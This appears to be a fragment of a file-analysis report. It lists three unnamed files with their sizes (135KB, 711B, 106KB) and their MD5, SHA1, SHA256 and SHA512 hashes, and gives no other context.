Filesize
135KB
MD53f6f93c3dccd4a91c4eb25c7f6feb1c1
SHA19b73f46adfa1f4464929b408407e73d4535c6827
SHA25619f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e
SHA512d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4
-
Filesize
711B
MD5558659936250e03cc14b60ebf648aa09
SHA132f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA2562445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA5121632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727
-
Filesize
106KB
MD5ba38615ab308efbdb2a877277ab76cd0
SHA1db1a7fb291820b7581f98cf0623462c431288e5e
SHA25606a5989061aac0564c43d883c74dc603f4489e149e04142d1bb7074b7e661bd1
SHA5125fb878c7875c6f38664bf56389d432883933b2ff956fd9fa7475da7926c4289c738ff7a1fb8a244d5e69f485b9520f678fff90ae6673a9c15a4de50a20518f54